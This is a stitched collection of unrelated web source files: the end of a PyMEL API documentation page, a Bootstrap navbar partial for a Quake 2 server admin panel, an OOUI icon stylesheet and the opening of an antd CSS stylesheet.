name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.setTranslateU"></a> <tt class="descname">setTranslateU</tt><big>(</big><em>val=True</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.setTranslateU" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies the U translation vector. C: Default is 0.0. Q: When queried, this flag returns a float.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.setTranslateV"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.setTranslateV"></a> <tt class="descname">setTranslateV</tt><big>(</big><em>val=True</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.setTranslateV" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies the V translation vector. C: Default is 0.0. Q: When queried, this flag returns a float.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> </dd></dl> </div> </div> </div> </div> <div class="sphinxsidebar"> <div class="sphinxsidebarwrapper"> <h4>Previous topic</h4> <p class="topless"><a href="pymel.core.nodetypes.PolyMoveFacetUV.html" title="previous chapter">pymel.core.nodetypes.PolyMoveFacetUV</a></p> <h4>Next topic</h4> <p class="topless"><a href="pymel.core.nodetypes.PolyMoveVertex.html" title="next chapter">pymel.core.nodetypes.PolyMoveVertex</a></p> <h3><a href="../../../modules.html">Core Modules</a></h3> <ul> <li><a class="reference external" href="../../pymel.core.animation.html#module-pymel.core.animation"><tt class="xref">animation</tt></a></li> <li><a class="reference external" href="../../pymel.core.effects.html#module-pymel.core.effects"><tt class="xref">effects</tt></a></li> <li><a class="reference external" href="../../pymel.core.general.html#module-pymel.core.general"><tt class="xref">general</tt></a></li> <li><a class="reference external" href="../../pymel.core.language.html#module-pymel.core.language"><tt class="xref">language</tt></a></li> <li><a class="reference external" href="../../pymel.core.modeling.html#module-pymel.core.modeling"><tt class="xref">modeling</tt></a></li> <li><a class="reference external" href="../../pymel.core.rendering.html#module-pymel.core.rendering"><tt class="xref">rendering</tt></a></li> <li><a class="reference external" href="../../pymel.core.system.html#module-pymel.core.system"><tt class="xref">system</tt></a></li> <li><a class="reference external" href="../../pymel.core.windows.html#module-pymel.core.windows"><tt class="xref">windows</tt></a></li> </ul> <h3><a href="../../../modules.html">Type Modules</a></h3> <ul> <li><a class="reference external" href="../../pymel.core.datatypes.html#module-pymel.core.datatypes"><tt class="xref">datatypes</tt></a></li> <li><a class="reference external" href="../../pymel.core.nodetypes.html#module-pymel.core.nodetypes"><tt class="xref">nodetypes</tt></a></li> <li><a class="reference external" href="../../pymel.core.uitypes.html#module-pymel.core.uitypes"><tt class="xref">uitypes</tt></a></li> </ul> <h3><a href="../../../modules.html">Other Modules</a></h3> <ul> <li><a class="reference external" href="../../pymel.api.plugins.html#module-pymel.api.plugins"><tt class="xref">plugins</tt></a></li> <li><a class="reference external" href="../../pymel.mayautils.html#module-pymel.mayautils"><tt class="xref">mayautils</tt></a></li> <li><a class="reference external" href="../../pymel.util.html#module-pymel.util"><tt class="xref">util</tt></a></li> <li><a class="reference external" href="../../pymel.versions.html#module-pymel.versions"><tt class="xref">versions</tt></a> </li><li><a class="reference external" href="../../pymel.tools.html#module-pymel.tools"><tt class="xref">tools</tt></a></li> </ul> <!-- <ul> <li><a class="reference external" href="../../pymel.core.animation.html.html#module-pymel.core.animation"><tt class="xref">animation</tt></a></li> <li><a class="reference external" href="../../pymel.core.datatypes.html.html#module-pymel.core.datatypes"><tt class="xref">datatypes</tt></a></li> <li><a class="reference external" href="../../pymel.core.effects.html.html#module-pymel.core.effects"><tt class="xref">effects</tt></a></li> <li><a class="reference external" href="../../pymel.core.general.html.html#module-pymel.core.general"><tt class="xref">general</tt></a></li> <li><a class="reference external" href="../../pymel.core.language.html.html#module-pymel.core.language"><tt class="xref">language</tt></a></li> <li><a class="reference external" href="../../pymel.core.modeling.html.html#module-pymel.core.modeling"><tt class="xref">modeling</tt></a></li> <li><a class="reference external" href="../../pymel.core.nodetypes.html.html#module-pymel.core.nodetypes"><tt class="xref">nodetypes</tt></a></li> <li><a class="reference external" href="../../pymel.core.rendering.html.html#module-pymel.core.rendering"><tt class="xref">rendering</tt></a></li> <li><a class="reference external" href="../../pymel.core.system.html.html#module-pymel.core.system"><tt class="xref">system</tt></a></li> <li><a class="reference external" href="../../pymel.core.windows.html.html#module-pymel.core.windows"><tt class="xref">windows</tt></a></li> <li><a class="reference external" href="../../pymel.util.html.html#module-pymel.util"><tt class="xref">pymel.util</tt></a></li> </ul> --> <h3>This Page</h3> <ul class="this-page-menu"> <li><a href="../../../_sources/generated/classes/pymel.core.nodetypes/pymel.core.nodetypes.PolyMoveUV.txt" rel="nofollow">Show Source</a></li> </ul> <div id="searchbox" style="display: none"> <h3>Quick search</h3> <form action="http://help.autodesk.com/cloudhelp/2016/ENU/Maya-Tech-Docs/PyMel/search.html" class="search" method="get"></form> <input name="q" type="text"/> <input type="submit" value="Go"/> <input name="check_keywords" type="hidden" value="yes"/> <input name="area" type="hidden" value="default"/> <p class="searchtip" style="font-size: 90%"> Enter search terms or a module, class or function name. </p> </div> <script type="text/javascript">$('#searchbox').show(0);</script> </div> </div> <div class="clearer"></div> </div> <div class="related"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../../../genindex.html" title="General Index">index</a></li> <li class="right"> <a href="../../../py-modindex.html" title="Python Module Index">modules</a> |</li> <li class="right"> <a href="pymel.core.nodetypes.PolyMoveVertex.html" title="pymel.core.nodetypes.PolyMoveVertex">next</a> |</li> <li class="right"> <a href="pymel.core.nodetypes.PolyMoveFacetUV.html" title="pymel.core.nodetypes.PolyMoveFacetUV">previous</a> |</li> <li><a href="../../../index-2.html">PyMEL 1.0.7 documentation</a> »</li> <li><a href="../../pymel.core.nodetypes.html">pymel.core.nodetypes</a> »</li> </ul> </div> <div class="footer"> © Copyright 2009, Chad Dombrova. Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.2.3. </div> <!-- Mirrored from help.autodesk.com/cloudhelp/2016/ENU/Maya-Tech-Docs/PyMel/generated/classes/pymel.core.nodetypes/pymel.core.nodetypes.PolyMoveUV.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 01 Aug 2015 05:21:40 GMT --> </body></html>
assets/js/partial/header.html
hifi/q2pro-admin
<nav class="navbar navbar-inverse navbar-fixed-top"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="#">Q2Pro Admin panel</a> </div> <div id="navbar" class="collapse navbar-collapse"> <ul class="nav navbar-nav"> <li class="active"><a href="#">Home</a></li> <li><a href="#about">asd</a></li> <li><a href="#contact">Contact</a></li> </ul> </div><!--/.nav-collapse --> </div> </nav>
ajax/libs/oojs-ui/0.39.3/oojs-ui-wikimediaui-icons-media.rtl.css
cdnjs/cdnjs
/*! * OOUI v0.39.3 * https://www.mediawiki.org/wiki/OOUI * * Copyright 2011–2020 OOUI Team and other contributors. * Released under the MIT license * http://oojs.mit-license.org * * Date: 2020-07-10T06:32:25Z */ .oo-ui-icon-camera { background-image: url('themes/wikimediaui/images/icons/camera.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/camera.svg'); } .oo-ui-image-invert.oo-ui-icon-camera { background-image: url('themes/wikimediaui/images/icons/camera-invert.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/camera-invert.svg'); } .oo-ui-image-progressive.oo-ui-icon-camera { background-image: url('themes/wikimediaui/images/icons/camera-progressive.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/camera-progressive.svg'); } .oo-ui-icon-chart { background-image: url('themes/wikimediaui/images/icons/chart.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/chart.svg'); } .oo-ui-image-invert.oo-ui-icon-chart { background-image: url('themes/wikimediaui/images/icons/chart-invert.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/chart-invert.svg'); } .oo-ui-image-progressive.oo-ui-icon-chart { background-image: url('themes/wikimediaui/images/icons/chart-progressive.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/chart-progressive.svg'); } .oo-ui-icon-exitFullscreen { background-image: url('themes/wikimediaui/images/icons/exitFullscreen.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/exitFullscreen.svg'); } .oo-ui-image-invert.oo-ui-icon-exitFullscreen { background-image: url('themes/wikimediaui/images/icons/exitFullscreen-invert.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/exitFullscreen-invert.svg'); } .oo-ui-image-progressive.oo-ui-icon-exitFullscreen { background-image: url('themes/wikimediaui/images/icons/exitFullscreen-progressive.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/exitFullscreen-progressive.svg'); } .oo-ui-icon-fullScreen { background-image: url('themes/wikimediaui/images/icons/fullScreen.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/fullScreen.svg'); } .oo-ui-image-invert.oo-ui-icon-fullScreen { background-image: url('themes/wikimediaui/images/icons/fullScreen-invert.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/fullScreen-invert.svg'); } .oo-ui-image-progressive.oo-ui-icon-fullScreen { background-image: url('themes/wikimediaui/images/icons/fullScreen-progressive.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/fullScreen-progressive.svg'); } .oo-ui-icon-image { background-image: url('themes/wikimediaui/images/icons/image.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/image.svg'); } .oo-ui-image-invert.oo-ui-icon-image { background-image: url('themes/wikimediaui/images/icons/image-invert.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/image-invert.svg'); } .oo-ui-image-progressive.oo-ui-icon-image { background-image: url('themes/wikimediaui/images/icons/image-progressive.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/image-progressive.svg'); } .oo-ui-icon-imageAdd { background-image: url('themes/wikimediaui/images/icons/imageAdd-rtl.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/imageAdd-rtl.svg'); } .oo-ui-image-invert.oo-ui-icon-imageAdd { background-image: url('themes/wikimediaui/images/icons/imageAdd-rtl-invert.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/imageAdd-rtl-invert.svg'); } .oo-ui-image-progressive.oo-ui-icon-imageAdd { background-image: url('themes/wikimediaui/images/icons/imageAdd-rtl-progressive.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/imageAdd-rtl-progressive.svg'); } .oo-ui-icon-imageBroken { background-image: url('themes/wikimediaui/images/icons/imageBroken.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/imageBroken.svg'); } .oo-ui-image-invert.oo-ui-icon-imageBroken { background-image: url('themes/wikimediaui/images/icons/imageBroken-invert.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/imageBroken-invert.svg'); } .oo-ui-image-progressive.oo-ui-icon-imageBroken { background-image: url('themes/wikimediaui/images/icons/imageBroken-progressive.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/imageBroken-progressive.svg'); } .oo-ui-icon-imageLock { background-image: url('themes/wikimediaui/images/icons/imageLock-rtl.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/imageLock-rtl.svg'); } .oo-ui-image-invert.oo-ui-icon-imageLock { background-image: url('themes/wikimediaui/images/icons/imageLock-rtl-invert.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/imageLock-rtl-invert.svg'); } .oo-ui-image-progressive.oo-ui-icon-imageLock { background-image: url('themes/wikimediaui/images/icons/imageLock-rtl-progressive.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/imageLock-rtl-progressive.svg'); } .oo-ui-icon-imageGallery { background-image: url('themes/wikimediaui/images/icons/imageGallery.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/imageGallery.svg'); } .oo-ui-image-invert.oo-ui-icon-imageGallery { background-image: url('themes/wikimediaui/images/icons/imageGallery-invert.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/imageGallery-invert.svg'); } .oo-ui-image-progressive.oo-ui-icon-imageGallery { background-image: url('themes/wikimediaui/images/icons/imageGallery-progressive.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/imageGallery-progressive.svg'); } .oo-ui-icon-musicalScore { background-image: url('themes/wikimediaui/images/icons/musicalScore.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/musicalScore.svg'); } .oo-ui-image-invert.oo-ui-icon-musicalScore { background-image: url('themes/wikimediaui/images/icons/musicalScore-invert.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/musicalScore-invert.svg'); } .oo-ui-image-progressive.oo-ui-icon-musicalScore { background-image: url('themes/wikimediaui/images/icons/musicalScore-progressive.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/musicalScore-progressive.svg'); } .oo-ui-icon-pause { background-image: url('themes/wikimediaui/images/icons/pause.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/pause.svg'); } .oo-ui-image-invert.oo-ui-icon-pause { background-image: url('themes/wikimediaui/images/icons/pause-invert.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/pause-invert.svg'); } .oo-ui-image-progressive.oo-ui-icon-pause { background-image: url('themes/wikimediaui/images/icons/pause-progressive.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/pause-progressive.svg'); } .oo-ui-icon-play { background-image: url('themes/wikimediaui/images/icons/play.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/play.svg'); } .oo-ui-image-invert.oo-ui-icon-play { background-image: url('themes/wikimediaui/images/icons/play-invert.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/play-invert.svg'); } .oo-ui-image-progressive.oo-ui-icon-play { background-image: url('themes/wikimediaui/images/icons/play-progressive.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/play-progressive.svg'); } .oo-ui-icon-stop { background-image: url('themes/wikimediaui/images/icons/stop.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/stop.svg'); } .oo-ui-image-invert.oo-ui-icon-stop { background-image: url('themes/wikimediaui/images/icons/stop-invert.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/stop-invert.svg'); } .oo-ui-image-progressive.oo-ui-icon-stop { background-image: url('themes/wikimediaui/images/icons/stop-progressive.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/stop-progressive.svg'); } .oo-ui-icon-zoomIn { background-image: url('themes/wikimediaui/images/icons/zoomIn.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/zoomIn.svg'); } .oo-ui-image-invert.oo-ui-icon-zoomIn { background-image: url('themes/wikimediaui/images/icons/zoomIn-invert.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/zoomIn-invert.svg'); } .oo-ui-image-progressive.oo-ui-icon-zoomIn { background-image: url('themes/wikimediaui/images/icons/zoomIn-progressive.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/zoomIn-progressive.svg'); } .oo-ui-icon-zoomOut { background-image: url('themes/wikimediaui/images/icons/zoomOut.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/zoomOut.svg'); } .oo-ui-image-invert.oo-ui-icon-zoomOut { background-image: url('themes/wikimediaui/images/icons/zoomOut-invert.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/zoomOut-invert.svg'); } .oo-ui-image-progressive.oo-ui-icon-zoomOut { background-image: url('themes/wikimediaui/images/icons/zoomOut-progressive.png'); background-image: linear-gradient(transparent, transparent), /* @embed */ url('themes/wikimediaui/images/icons/zoomOut-progressive.svg'); }
ajax/libs/antd/4.18.0/antd.variable.css
cdnjs/cdnjs
/*! * * antd v4.18.0 * * Copyright 2015-present, Alipay, Inc. * All rights reserved. * */ /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } [class^=ant-]::-ms-clear, [class*= ant-]::-ms-clear, [class^=ant-] input::-ms-clear, [class*= ant-] input::-ms-clear, [class^=ant-] input::-ms-reveal, [class*= ant-] input::-ms-reveal { display: none; } /* stylelint-disable property-no-vendor-prefix, at-rule-no-vendor-prefix */ html, body { width: 100%; height: 100%; } input::-ms-clear, input::-ms-reveal { display: none; } *, *::before, *::after { box-sizing: border-box; } html { font-family: sans-serif; line-height: 1.15; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; -ms-overflow-style: scrollbar; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); } @-ms-viewport { width: device-width; } body { margin: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, 'Noto Sans', sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol', 'Noto Color Emoji'; font-variant: tabular-nums; line-height: 1.5715; background-color: #fff; font-feature-settings: 'tnum'; } [tabindex='-1']:focus { outline: none !important; } hr { box-sizing: content-box; height: 0; overflow: visible; } h1, h2, h3, h4, h5, h6 { margin-top: 0; margin-bottom: 0.5em; color: rgba(0, 0, 0, 0.85); font-weight: 500; } p { margin-top: 0; margin-bottom: 1em; } abbr[title], abbr[data-original-title] { text-decoration: underline; -webkit-text-decoration: underline dotted; text-decoration: underline dotted; border-bottom: 0; cursor: help; } address { margin-bottom: 1em; font-style: normal; line-height: inherit; } input[type='text'], input[type='password'], input[type='number'], textarea { -webkit-appearance: none; } ol, ul, dl { margin-top: 0; margin-bottom: 1em; } ol ol, ul ul, ol ul, ul ol { margin-bottom: 0; } dt { font-weight: 500; } dd { margin-bottom: 0.5em; margin-left: 0; } blockquote { margin: 0 0 1em; } dfn { font-style: italic; } b, strong { font-weight: bolder; } small { font-size: 80%; } sub, sup { position: relative; font-size: 75%; line-height: 0; vertical-align: baseline; } sub { bottom: -0.25em; } sup { top: -0.5em; } a { color: var(--ant-primary-color); text-decoration: none; background-color: transparent; outline: none; cursor: pointer; transition: color 0.3s; -webkit-text-decoration-skip: objects; } a:hover { color: var(--ant-primary-color-hover); } a:active { color: var(--ant-primary-color-active); } a:active, a:hover { text-decoration: none; outline: 0; } a:focus { text-decoration: none; outline: 0; } a[disabled] { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } pre, code, kbd, samp { font-size: 1em; font-family: 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace; } pre { margin-top: 0; margin-bottom: 1em; overflow: auto; } figure { margin: 0 0 1em; } img { vertical-align: middle; border-style: none; } svg:not(:root) { overflow: hidden; } a, area, button, [role='button'], input:not([type='range']), label, select, summary, textarea { touch-action: manipulation; } table { border-collapse: collapse; } caption { padding-top: 0.75em; padding-bottom: 0.3em; color: rgba(0, 0, 0, 0.45); text-align: left; caption-side: bottom; } input, button, select, optgroup, textarea { margin: 0; color: inherit; font-size: inherit; font-family: inherit; line-height: inherit; } button, input { overflow: visible; } button, select { text-transform: none; } button, html [type="button"], [type="reset"], [type="submit"] { -webkit-appearance: button; } button::-moz-focus-inner, [type='button']::-moz-focus-inner, [type='reset']::-moz-focus-inner, [type='submit']::-moz-focus-inner { padding: 0; border-style: none; } input[type='radio'], input[type='checkbox'] { box-sizing: border-box; padding: 0; } input[type='date'], input[type='time'], input[type='datetime-local'], input[type='month'] { -webkit-appearance: listbox; } textarea { overflow: auto; resize: vertical; } fieldset { min-width: 0; margin: 0; padding: 0; border: 0; } legend { display: block; width: 100%; max-width: 100%; margin-bottom: 0.5em; padding: 0; color: inherit; font-size: 1.5em; line-height: inherit; white-space: normal; } progress { vertical-align: baseline; } [type='number']::-webkit-inner-spin-button, [type='number']::-webkit-outer-spin-button { height: auto; } [type='search'] { outline-offset: -2px; -webkit-appearance: none; } [type='search']::-webkit-search-cancel-button, [type='search']::-webkit-search-decoration { -webkit-appearance: none; } ::-webkit-file-upload-button { font: inherit; -webkit-appearance: button; } output { display: inline-block; } summary { display: list-item; } template { display: none; } [hidden] { display: none !important; } mark { padding: 0.2em; background-color: #feffe6; } ::-moz-selection { color: #fff; background: var(--ant-primary-color); } ::selection { color: #fff; background: var(--ant-primary-color); } .clearfix::before { display: table; content: ''; } .clearfix::after { display: table; clear: both; content: ''; } .anticon { display: inline-block; color: inherit; font-style: normal; line-height: 0; text-align: center; text-transform: none; vertical-align: -0.125em; text-rendering: optimizeLegibility; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .anticon > * { line-height: 1; } .anticon svg { display: inline-block; } .anticon::before { display: none; } .anticon .anticon-icon { display: block; } .anticon[tabindex] { cursor: pointer; } .anticon-spin::before { display: inline-block; -webkit-animation: loadingCircle 1s infinite linear; animation: loadingCircle 1s infinite linear; } .anticon-spin { display: inline-block; -webkit-animation: loadingCircle 1s infinite linear; animation: loadingCircle 1s infinite linear; } .ant-fade-enter, .ant-fade-appear { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-fade-leave { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-fade-enter.ant-fade-enter-active, .ant-fade-appear.ant-fade-appear-active { -webkit-animation-name: antFadeIn; animation-name: antFadeIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-fade-leave.ant-fade-leave-active { -webkit-animation-name: antFadeOut; animation-name: antFadeOut; -webkit-animation-play-state: running; animation-play-state: running; pointer-events: none; } .ant-fade-enter, .ant-fade-appear { opacity: 0; -webkit-animation-timing-function: linear; animation-timing-function: linear; } .ant-fade-leave { -webkit-animation-timing-function: linear; animation-timing-function: linear; } @-webkit-keyframes antFadeIn { 0% { opacity: 0; } 100% { opacity: 1; } } @keyframes antFadeIn { 0% { opacity: 0; } 100% { opacity: 1; } } @-webkit-keyframes antFadeOut { 0% { opacity: 1; } 100% { opacity: 0; } } @keyframes antFadeOut { 0% { opacity: 1; } 100% { opacity: 0; } } .ant-move-up-enter, .ant-move-up-appear { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-move-up-leave { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-move-up-enter.ant-move-up-enter-active, .ant-move-up-appear.ant-move-up-appear-active { -webkit-animation-name: antMoveUpIn; animation-name: antMoveUpIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-move-up-leave.ant-move-up-leave-active { -webkit-animation-name: antMoveUpOut; animation-name: antMoveUpOut; -webkit-animation-play-state: running; animation-play-state: running; pointer-events: none; } .ant-move-up-enter, .ant-move-up-appear { opacity: 0; -webkit-animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); } .ant-move-up-leave { -webkit-animation-timing-function: cubic-bezier(0.6, 0.04, 0.98, 0.34); animation-timing-function: cubic-bezier(0.6, 0.04, 0.98, 0.34); } .ant-move-down-enter, .ant-move-down-appear { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-move-down-leave { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-move-down-enter.ant-move-down-enter-active, .ant-move-down-appear.ant-move-down-appear-active { -webkit-animation-name: antMoveDownIn; animation-name: antMoveDownIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-move-down-leave.ant-move-down-leave-active { -webkit-animation-name: antMoveDownOut; animation-name: antMoveDownOut; -webkit-animation-play-state: running; animation-play-state: running; pointer-events: none; } .ant-move-down-enter, .ant-move-down-appear { opacity: 0; -webkit-animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); } .ant-move-down-leave { -webkit-animation-timing-function: cubic-bezier(0.6, 0.04, 0.98, 0.34); animation-timing-function: cubic-bezier(0.6, 0.04, 0.98, 0.34); } .ant-move-left-enter, .ant-move-left-appear { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-move-left-leave { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-move-left-enter.ant-move-left-enter-active, .ant-move-left-appear.ant-move-left-appear-active { -webkit-animation-name: antMoveLeftIn; animation-name: antMoveLeftIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-move-left-leave.ant-move-left-leave-active { -webkit-animation-name: antMoveLeftOut; animation-name: antMoveLeftOut; -webkit-animation-play-state: running; animation-play-state: running; pointer-events: none; } .ant-move-left-enter, .ant-move-left-appear { opacity: 0; -webkit-animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); } .ant-move-left-leave { -webkit-animation-timing-function: cubic-bezier(0.6, 0.04, 0.98, 0.34); animation-timing-function: cubic-bezier(0.6, 0.04, 0.98, 0.34); } .ant-move-right-enter, .ant-move-right-appear { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-move-right-leave { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-move-right-enter.ant-move-right-enter-active, .ant-move-right-appear.ant-move-right-appear-active { -webkit-animation-name: antMoveRightIn; animation-name: antMoveRightIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-move-right-leave.ant-move-right-leave-active { -webkit-animation-name: antMoveRightOut; animation-name: antMoveRightOut; -webkit-animation-play-state: running; animation-play-state: running; pointer-events: none; } .ant-move-right-enter, 